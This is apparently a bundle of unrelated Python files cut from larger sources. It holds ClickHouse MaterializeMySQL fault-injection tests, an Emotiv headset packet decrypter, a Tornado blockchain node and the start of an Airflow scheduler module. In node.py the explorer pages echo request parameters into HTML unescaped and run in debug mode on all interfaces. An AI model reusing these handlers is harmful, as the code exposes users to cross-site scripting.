    mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
    clickhouse_node.query(
        "CREATE DATABASE priv_err_db ENGINE = MaterializeMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
            service_name))
    assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
    assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
    clickhouse_node.query("DROP DATABASE priv_err_db")

    # Same outcome without REPLICATION CLIENT / RELOAD.
    mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
    clickhouse_node.query(
        "CREATE DATABASE priv_err_db ENGINE = MaterializeMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
            service_name))
    assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
    assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
    clickhouse_node.query("DETACH DATABASE priv_err_db")

    # Without SELECT, ATTACH must fail with an explicit access error.
    mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
    time.sleep(3)

    with pytest.raises(QueryRuntimeException) as exception:
        clickhouse_node.query("ATTACH DATABASE priv_err_db")

    assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
    assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")

    # Restoring SELECT makes ATTACH succeed again.
    mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
    time.sleep(3)
    clickhouse_node.query("ATTACH DATABASE priv_err_db")
    clickhouse_node.query("DROP DATABASE priv_err_db")

    mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
    mysql_node.query("DROP DATABASE priv_err_db;")
    mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='DROP'):
    """Remove the firewall rules installed by drop_instance_mysql_connections.

    Deletes both directions (node -> MySQL:3306 and MySQL:3306 -> node),
    then sleeps to let in-flight connections settle.

    :param clickhouse_node: cluster instance whose traffic was blocked.
    :param pm: PartitionManager owning the iptables-style rules.
    :param action: rule action to delete; must match the one used when adding.
    """
    pm._check_instance(clickhouse_node)
    pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
    pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
    time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='DROP'):
    """Block all MySQL (port 3306) traffic to and from a cluster instance.

    Installs symmetric firewall rules via the PartitionManager, then sleeps
    so established connections have time to break.

    :param clickhouse_node: cluster instance to isolate from MySQL.
    :param pm: PartitionManager to install the rules on.
    :param action: firewall action for the rules (default 'DROP').
    """
    pm._check_instance(clickhouse_node)
    pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
    pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
    time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
    """Verify MaterializeMySQL behaviour across a network partition.

    While MySQL is unreachable the existing mapping serves stale data and
    creating a new mapping fails; after the partition heals, a
    DETACH/ATTACH cycle resynchronises and new mappings work again.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test")
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("DROP DATABASE IF EXISTS test")
    mysql_node.query("CREATE DATABASE test_database;")
    mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    mysql_node.query("CREATE DATABASE test;")

    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table", '')

    with PartitionManager() as pm:
        # Cut off MySQL; the insert below cannot reach ClickHouse.
        drop_instance_mysql_connections(clickhouse_node, pm)
        mysql_node.query('INSERT INTO test_database.test_table VALUES(1)')
        check_query(clickhouse_node, "SELECT * FROM test_database.test_table", '')

        # Creating a new mapping while partitioned must fail loudly.
        with pytest.raises(QueryRuntimeException) as exception:
            clickhouse_node.query(
                "CREATE DATABASE test ENGINE = MaterializeMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))

        assert "Can't connect to MySQL server" in str(exception.value)

        # Heal the partition; DETACH/ATTACH forces a resync.
        restore_instance_mysql_connections(clickhouse_node, pm)

        clickhouse_node.query("DETACH DATABASE test_database")
        clickhouse_node.query("ATTACH DATABASE test_database")
        check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')

        clickhouse_node.query(
            "CREATE DATABASE test ENGINE = MaterializeMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
        check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table\n")

        mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
        check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")

        clickhouse_node.query("DROP DATABASE test_database")
        clickhouse_node.query("DROP DATABASE test")
        mysql_node.query("DROP DATABASE test_database")
        mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
    """Kill the MySQL thread serving the binlog dump and verify that a
    DETACH/ATTACH of the MaterializeMySQL database restores replication.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
    mysql_node.query("DROP DATABASE IF EXISTS test_database;")
    mysql_node.query("CREATE DATABASE test_database;")
    mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
    clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')

    # The replication (binlog dump) connection is identifiable by this state.
    get_sync_id_query = "select id from information_schema.processlist where STATE='Master has sent all binlog to slave; waiting for more updates'"
    result = mysql_node.query_and_get_data(get_sync_id_query)
    for row in result:
        # Fix: dropped the unused `row_result = {}` local from the original.
        mysql_node.query("kill " + str(row[0]) + ";")

    with pytest.raises(QueryRuntimeException) as exception:
        # https://dev.mysql.com/doc/refman/5.7/en/kill.html
        # When you use KILL, a thread-specific kill flag is set for the thread.
        # In most cases, it might take some time for the thread to die because
        # the kill flag is checked only at specific intervals:
        time.sleep(3)
        clickhouse_node.query("SELECT * FROM test_database.test_table")

    assert "Cannot read all data" in str(exception.value)

    # DETACH/ATTACH re-establishes the binlog connection.
    clickhouse_node.query("DETACH DATABASE test_database")
    clickhouse_node.query("ATTACH DATABASE test_database")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
    mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
    """Stop the MySQL container while a background thread is inserting, check
    ClickHouse reports the lost master, then verify recovery after restart.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
    mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializeMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')

    try:
        def insert(num):
            # Keeps inserting until the connection dies with the container.
            for i in range(num):
                query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format(v=i + 1)
                mysql_node.query(query)

        t = threading.Thread(target=insert, args=(10000,))
        t.start()

        run_and_check(
            ['docker-compose', '-p', mysql_node.project_name, '-f', mysql_node.docker_compose, 'stop'])
    finally:
        # Fix: local was misspelled `execption` in the original.
        with pytest.raises(QueryRuntimeException) as exception:
            time.sleep(5)
            clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
        assert "Master maybe lost." in str(exception.value)

        run_and_check(
            ['docker-compose', '-p', mysql_node.project_name, '-f', mysql_node.docker_compose, 'start'])
        mysql_node.wait_mysql_to_start(120)

        clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
        clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")

        # Whatever row count survived in MySQL is what ClickHouse must serve.
        result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
        for row in result:
            res = str(row[0]) + '\n'
            check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)

        mysql_node.query("DROP DATABASE kill_mysql_while_insert")
        clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
    """Kill-restart ClickHouse while MySQL inserts are in flight and verify
    the replicated row count matches MySQL afterwards.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
    mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
    clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializeMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')

    def insert(num):
        # Inserts run against MySQL only; replication must catch up later.
        for i in range(num):
            query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
            mysql_node.query(query)

    t = threading.Thread(target=insert, args=(1000,))
    t.start()

    # TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
    clickhouse_node.restart_clickhouse(20, kill=True)
    # Wait for all 1000 inserts to land in MySQL before comparing counts.
    t.join()

    result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
    for row in result:
        res = str(row[0]) + '\n'
        check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)

    mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
    clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
    """Verify 4-byte UTF-8 characters (outside the BMP, e.g. emoji) survive
    replication from a utf8mb4 MySQL table into ClickHouse.

    :param clickhouse_node: ClickHouse cluster instance to query.
    :param mysql_node: MySQL cluster instance to query.
    :param service_name: docker-compose service name of the MySQL server.
    """
    mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
    clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
    mysql_node.query("CREATE DATABASE utf8mb4_test")
    mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
    # U+1F984 (unicorn) needs 4 bytes in utf8mb4; U+2601 needs only 3.
    mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
    clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializeMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
    check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
|
decrypter.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division
import os
import sys
import time
from threading import Lock, Thread
from Crypto.Cipher import AES
from .python_queue import Queue
from .util import crypto_key, epoc_plus_crypto_key, new_crypto_key
class EmotivCrypto:
    """Background AES decryptor for Emotiv headset packets.

    Encrypted packets go in via add_task(), a daemon thread decrypts them,
    and decrypted packets come out via get_data(). Thread-safe state
    (running/stop) is guarded by self.lock.
    """

    def __init__(self, serial_number=None, is_research=False, verbose=False, force_epoc_mode=False,
                 force_old_crypto=False):
        """
        Performs decryption of packets received. Stores decrypted packets in a Queue for use.

        :param serial_number - The serial number to use for AES key generation.
        :param is_research - Is this a research edition headset? Also, EPOC+ uses this now.
        :param verbose - Print diagnostic messages while running.
        :param force_epoc_mode - Force the EPOC+ key derivation for UD2016 serials.
        :param force_old_crypto - Force the legacy key derivation even for UD2016 serials.
        """
        # Where the encrypted data is Queued.
        self._encrypted_queue = Queue()
        # Where the decrypted data is Queued.
        self._decrypted_queue = Queue()
        self.force_epoc_mode = force_epoc_mode
        self.force_old_crypto = force_old_crypto
        # Running state.
        self.running = False
        self.verbose = verbose
        # Stop signal tells the loop to stop after processing remaining tasks.
        self._stop_signal = False
        # The emotiv serial number.
        self.serial_number = serial_number
        # EPOC+ and research edition may need to have this set to True
        # TODO: Add functions that check variance in data received. If extreme toggle is_research and check again.
        #       If extreme again raise exception and shutdown emokit.
        self.is_research = is_research
        # Guards self.running / self._stop_signal across threads.
        self.lock = Lock()
        # Daemon thread so a crashed main thread does not hang the process.
        self.thread = Thread(target=self.run)
        self.thread.setDaemon(True)

    def run(self):
        """
        The crypto loop. Decrypts data in encrypted Queue and puts it onto the decrypted Queue.

        Do not call explicitly, use .start() instead.
        """
        # Initialize AES
        cipher = self.new_cipher(self.verbose)
        # Lock discipline: the lock is held while `self.running` is read at
        # the loop head and while the stop flag is checked at the loop tail;
        # it is released around the actual decryption work.
        self.lock.acquire()
        while self.running:
            self.lock.release()
            # While the encrypted queue is not empty.
            while not self._encrypted_queue.empty():
                # Get some encrypted data off of the encrypted Queue.
                encrypted_task = self._encrypted_queue.get()
                # Make sure the encrypted data is not None.
                if encrypted_task is not None:
                    # Make sure the encrypted data is not empty.
                    if encrypted_task.data is not None:
                        if len(encrypted_task.data):
                            try:
                                # Python 3 compatibility
                                if sys.version_info >= (3, 0):
                                    # Convert to byte array or bytes like object.
                                    encrypted_data = bytes(encrypted_task.data, encoding='latin-1')
                                else:
                                    encrypted_data = encrypted_task.data
                                # Decrypt the encrypted data.
                                decrypted_data = decrypt_data(cipher, encrypted_data)
                                # Put the decrypted data onto the decrypted Queue,
                                # reusing the task object as the carrier.
                                encrypted_task.data = decrypted_data
                                self._decrypted_queue.put_nowait(encrypted_task)
                            except Exception as ex:
                                # Catch everything, and print exception.
                                # TODO: Make this more specific perhaps?
                                print(
                                    "Emotiv CryptoError ", sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2],
                                    " : ",
                                    ex)
            # If stop signal is received and all the pending data in the encrypted Queue is processed, stop running.
            self.lock.acquire()
            if self._stop_signal and self._encrypted_queue.empty():
                print("Crypto thread stopping.")
                self.running = False
            time.sleep(0.00001)
        self.lock.release()

    def start(self):
        """
        Starts the crypto thread.
        """
        # NOTE(review): `running` is set without the lock here; presumably
        # safe because the thread has not started yet -- confirm.
        self.running = True
        self.thread.start()

    def stop(self):
        """
        Stops the crypto thread.

        Sets the stop signal (the loop drains remaining tasks first) and
        waits up to 60 seconds for the thread to exit.
        """
        self.lock.acquire()
        self._stop_signal = True
        self.lock.release()
        self.thread.join(60)

    def new_cipher(self, verbose=False):
        """
        Generates a new AES cipher from the serial number and headset version.

        :param verbose: print diagnostic messages while deriving the key.
        :return: New AES cipher
        :raises ValueError: if no serial number was configured.
        """
        if verbose:
            print("EmotivCrypto: Generating new AES cipher.")
        # Create initialization vector.
        # NOTE(review): ECB mode does not use an IV, so `iv` is presumably
        # ignored by the cipher constructor -- confirm against the installed
        # PyCrypto/PyCryptodome version.
        iv = os.urandom(AES.block_size)
        # Make sure the serial number was set.
        if self.serial_number is None:
            raise ValueError("Serial number must not be None.")
        if verbose:
            print("EmotivCrypto: Serial Number - {serial_number}".format(serial_number=self.serial_number))
        # Create and return new AES class, using the serial number and headset version.
        if self.serial_number.startswith('UD2016') and not self.force_old_crypto:
            # Newer (2016+) headsets use a different key derivation.
            if self.force_epoc_mode:
                return AES.new(epoc_plus_crypto_key(self.serial_number), AES.MODE_ECB, iv)
            else:
                return AES.new(new_crypto_key(self.serial_number, self.verbose))
        else:
            return AES.new(crypto_key(self.serial_number, self.is_research, verbose), AES.MODE_ECB, iv)

    def add_task(self, data):
        """
        Gives the crypto thread some encrypted data to decrypt, unless the crypto class' _stop_signal is True.

        :param data: Encrypted Data
        """
        # If the stop signal has not been set yet.
        if not self._stop_signal:
            # Add encrypted data to the encrypted Queue.
            self._encrypted_queue.put_nowait(data)

    def get_data(self):
        """
        Gives decrypted data from the crypto thread, if the queue isn't empty.

        :return: Decrypted data or None
        """
        # If the decrypted queue is not empty, get data from the Queue and return it.
        if not self._decrypted_queue.empty():
            return self._decrypted_queue.get_nowait()
        # Otherwise, return None.
        return None

    def data_ready(self):
        """
        :return: If queue is not empty, return True
        """
        if not self._decrypted_queue.empty():
            return True
        return False

    def __exit__(self, exc_type, exc_val, exc_tb):
        """
        Do cleanup stuff.

        NOTE(review): there is no matching __enter__ in this class, so
        `with EmotivCrypto(...)` would fail -- presumably called manually
        or via a subclass; confirm.

        :param exc_type:
        :param exc_val:
        :param exc_tb:
        :return:
        """
        self.stop()
def decrypt_data(cipher, data):
    """Decrypt *data* with *cipher*, split into two 16-byte AES blocks.

    :param cipher: AES cipher object exposing ``decrypt``.
    :param data: Encrypted bytes (first block plus remainder).
    :return: Concatenated decrypted bytes.
    """
    first_block = cipher.decrypt(data[:16])
    remainder = cipher.decrypt(data[16:])
    return first_block + remainder
|
node.py | from __future__ import print_function
import time
import socket
import subprocess
import argparse
import uuid
import base64
import threading
import tornado.web
import tornado.ioloop
import tornado.options
import tornado.httpserver
# import tornado.httpclient
# import tornado.websocket
import tornado.gen
import tornado.escape
import setting
import tree
import miner
import chain
import database
# import fs
# import msg
class Application(tornado.web.Application):
    """Tornado application wiring URL routes to node/miner/chain handlers."""

    def __init__(self):
        # Route table: tree/miner websocket-style endpoints, chain queries,
        # and the HTML dashboard/explorer pages defined in this module.
        handlers = [(r"/node", tree.NodeHandler),
                    (r"/miner", tree.MinerHandler),
                    (r"/available_branches", AvailableBranchesHandler),
                    (r"/get_node", GetNodeHandler),
                    (r"/get_highest_block", chain.GetHighestBlockHandler),
                    (r"/get_block", chain.GetBlockHandler),
                    (r"/get_proof", chain.GetProofHandler),
                    (r"/get_highest_subchain_block", chain.GetHighestSubchainBlockHandler),
                    (r"/get_subchain_block", chain.GetSubchainBlockHandler),
                    (r"/new_subchain_block", NewSubchainBlockHandler),
                    (r"/dashboard", DashboardHandler),
                    (r"/chain_explorer", ChainExplorerHandler),
                    (r"/subchain_explorer", SubchainExplorerHandler),
                    (r"/user_explorer", UserExplorerHandler),
                    # (r"/disconnect", DisconnectHandler),
                    # (r"/broadcast", BroadcastHandler),
                    ]
        settings = {"debug": True}
        tornado.web.Application.__init__(self, handlers, **settings)
class AvailableBranchesHandler(tornado.web.RequestHandler):
    """Return this node's currently available tree branches as JSON."""

    def get(self):
        branches = list(tree.available_branches)
        # parent = tree.NodeConnector.node_parent:
        self.finish({"available_branches": branches,
                     # "parent": parent,
                     "nodeid": tree.current_nodeid})
class GetNodeHandler(tornado.web.RequestHandler):
    """Resolve the known node closest (per tree.node_distance) to a node id."""

    def get(self):
        wanted = self.get_argument("nodeid")
        # Default to ourselves when no neighbour or parent is known.
        best_id = wanted
        best_score = None
        best_address = [tree.current_host, tree.current_port]
        # Neighbourhoods are scanned before parents; strict `<` keeps the
        # first candidate on distance ties, matching the original order.
        for table in (tree.node_neighborhoods, tree.node_parents):
            for candidate, candidate_address in table.items():
                distance = tree.node_distance(wanted, candidate)
                if best_score is None or distance < best_score:
                    best_score = distance
                    best_id = candidate
                    best_address = candidate_address
        self.finish({"address": best_address,
                     "nodeid": best_id,
                     "current_nodeid": tree.current_nodeid})
class DisconnectHandler(tornado.web.RequestHandler):
    """Close the parent connection and stop this node's IOLoop.

    NOTE(review): currently commented out of the route table in Application.
    """

    def get(self):
        if tree.NodeConnector.node_parent:
            # connector.remove_node = False
            tree.NodeConnector.node_parent.close()
        self.finish({})
        # Stops the whole process's event loop, not just this request.
        tornado.ioloop.IOLoop.instance().stop()
class BroadcastHandler(tornado.web.RequestHandler):
    """Flood a uniquely-tagged test message through the tree (debug aid).

    NOTE(review): currently commented out of the route table in Application.
    """

    def get(self):
        # Timestamp + uuid make each broadcast distinguishable downstream.
        test_msg = ["TEST_MSG", tree.current_nodeid, time.time(), uuid.uuid4().hex]
        tree.forward(test_msg)
        self.finish({"test_msg": test_msg})
class NewSubchainBlockHandler(tornado.web.RequestHandler):
    """Accept a subchain block via HTTP POST, record it, and flood it."""

    def post(self):
        block = tornado.escape.json_decode(self.request.body)
        # Two separate list objects are built on purpose: new_subchain_block
        # and forward each get their own message instance.
        chain.new_subchain_block(["NEW_SUBCHAIN_BLOCK"] + block)
        tree.forward(["NEW_SUBCHAIN_BLOCK"] + block)  # + [time.time(), uuid.uuid4().hex]
        self.finish({"block": block})
class DashboardHandler(tornado.web.RequestHandler):
    """Render a plain-HTML debug dashboard of this node's runtime state.

    Shows the node id and public key, parent/neighbour addresses, recent
    chain blocks, the node pools, available branches, and the frozen chain.
    """

    def get(self):
        branches = list(tree.available_branches)
        # Shortest-suffix branches first (sorted by the length of field 2).
        branches.sort(key=lambda l: len(l[2]))
        # Fix: dropped the unused `parents = []` local from the original.

        self.write("<a href='/chain_explorer'>Chain Explorer</a> ")
        self.write("<a href='/user_explorer'>User Explorer</a></br>")
        self.write("<br>current_nodeid: %s <br>" % tree.current_nodeid)
        self.write("<br>pk: %s <br>" % base64.b32encode(tree.node_sk.get_verifying_key().to_string()).decode("utf8"))
        # sender = base64.b32encode(sender_vk.to_string()).decode("utf8")

        self.write("<br>node_parent:<br>")
        if tree.NodeConnector.node_parent:
            self.write("%s:%s<br>" % (tree.NodeConnector.node_parent.host, tree.NodeConnector.node_parent.port))

        self.write("<br>node_parents:<br>")
        for nodeid in tree.node_parents:
            host, port = tree.node_parents[nodeid]
            self.write("%s %s:%s<br>" % (nodeid, host, port))

        self.write("<br>node_neighborhoods:<br>")
        for nodeid in tree.node_neighborhoods:
            host, port = tree.node_neighborhoods[nodeid]
            self.write("%s %s:%s <a href='http://%s:%s/dashboard'>dashboard</a><br>" % (nodeid, host, port, host, port))

        self.write("<br>recent longest:<br>")
        for i in reversed(chain.recent_longest):
            self.write("%s <a href='/get_block?hash=%s'>%s</a> %s<br>" % (i[3], i[1], i[1], i[6]))

        self.write("<br>nodes_pool:<br>")
        for nodeid in tree.nodes_pool:
            pk = tree.nodes_pool[nodeid]
            self.write("%s: %s<br>" % (nodeid, pk))

        self.write("<br>nodes_in_chain:<br>")
        for nodeid in chain.nodes_in_chain:
            pk = chain.nodes_in_chain[nodeid]
            self.write("%s: %s<br>" % (nodeid, pk))

        self.write("<br>frozen_nodes_in_chain:<br>")
        for nodeid in chain.frozen_nodes_in_chain:
            pk = chain.frozen_nodes_in_chain[nodeid]
            self.write("%s: %s<br>" % (nodeid, pk))

        self.write("<br>available_branches:<br>")
        for branch in branches:
            self.write("%s:%s %s <br>" % branch)

        self.write("<br>frozen chain:<br>")
        for i, h in enumerate(chain.frozen_chain):
            self.write("%s <a href='/get_block?hash=%s'>%s</a><br>" % (i, h, h))

        self.finish()
class ChainExplorerHandler(tornado.web.RequestHandler):
    """HTML page listing main-chain blocks at a given height, with paging."""

    def get(self):
        # Height to browse; defaults to 1 for the first page.
        height = self.get_argument('height', 1)
        self.write("<a href='/dashboard'>Dashboard</a> ")
        self.write("<a href='/user_explorer'>User Explorer</a></br>")
        # Prev/Next links step one height at a time.
        self.write("<a href='/chain_explorer?height=%s'>Prev</a> " % (int(height)-1, ))
        self.write("<a href='/chain_explorer?height=%s'>Next</a><br>" % (int(height)+1, ))

        conn = database.get_conn()
        c = conn.cursor()
        # Parameterized query -- height comes from the request.
        c.execute("SELECT * FROM chain WHERE height = ?", (height, ))
        blocks = c.fetchall()
        for block in blocks:
            self.write("<code>%s</code><br>" % str(block))
class SubchainExplorerHandler(tornado.web.RequestHandler):
    """HTML page listing one sender's subchain blocks at a height, with paging."""

    def get(self):
        # `sender` is required; `height` defaults to 1.
        sender = self.get_argument('sender')
        height = self.get_argument('height', 1)
        self.write("<a href='/dashboard'>Dashboard</a> ")
        self.write("<a href='/chain_explorer'>Chain Explorer</a> ")
        self.write("<a href='/user_explorer'>User Explorer</a></br>")
        self.write("<a href='/subchain_explorer?height=%s&sender=%s'>Prev</a> " % (int(height)-1, sender))
        self.write("<a href='/subchain_explorer?height=%s&sender=%s'>Next</a><br>" % (int(height)+1, sender))

        conn = database.get_conn()
        c = conn.cursor()
        # Parameterized query -- both values come from the request.
        c.execute("SELECT * FROM subchains WHERE sender = ? AND height = ?", (sender, height))
        blocks = c.fetchall()
        for block in blocks:
            self.write("<code>%s</code><br>" % str(block))
class UserExplorerHandler(tornado.web.RequestHandler):
    """Lists every distinct subchain sender as a link to its subchain."""

    def get(self):
        """Render one subchain-explorer link per distinct sender."""
        cursor = database.get_conn().cursor()
        cursor.execute("SELECT DISTINCT(sender) FROM subchains")
        rows = cursor.fetchall()
        self.write("<a href='/dashboard'>Dashboard</a> ")
        self.write("<a href='/chain_explorer'>Chain Explorer</a> <br>")
        for row in rows:
            self.write("<a href='/subchain_explorer?sender=%s'>%s</a><br>"% (row[0], row[0]))
def main():
    """Bootstrap node state, start the miner worker thread and serve HTTP.

    Blocks inside the tornado IOLoop until it is stopped, then joins the
    worker thread.
    """
    tree.main()
    # miner.main()
    # Kick off the mining loop once the IOLoop is running (1s delay).
    tornado.ioloop.IOLoop.instance().call_later(1, miner.looping)
    # leader.main()
    # tornado.ioloop.IOLoop.instance().call_later(1, leader.mining)
    # fs.main()
    worker_threading = threading.Thread(target=miner.worker_thread)
    worker_threading.start()
    # Unpause the worker only after the thread exists.
    chain.worker_thread_pause = False
    server = Application()
    server.listen(tree.current_port, '0.0.0.0')
    # Blocks until the IOLoop is stopped.
    tornado.ioloop.IOLoop.instance().start()
    worker_threading.join()
# Script entry point.
if __name__ == '__main__':
    main()
|
event_based_scheduler_job.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import traceback
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.events.context_extractor import ContextExtractor, EventContext
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.event_progress import get_event_progress, create_or_update_progress
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc, case
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel, BaseOperator
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent,
DagRunCreatedEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
# Short ORM aliases used throughout this module.
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
    """Core event loop of the event-based scheduler.

    Pulls messages from a Mailbox and turns them into scheduling work:
    creating dag runs, dispatching task instances to the executor and
    relaying events to per-dagrun event handlers.
    """
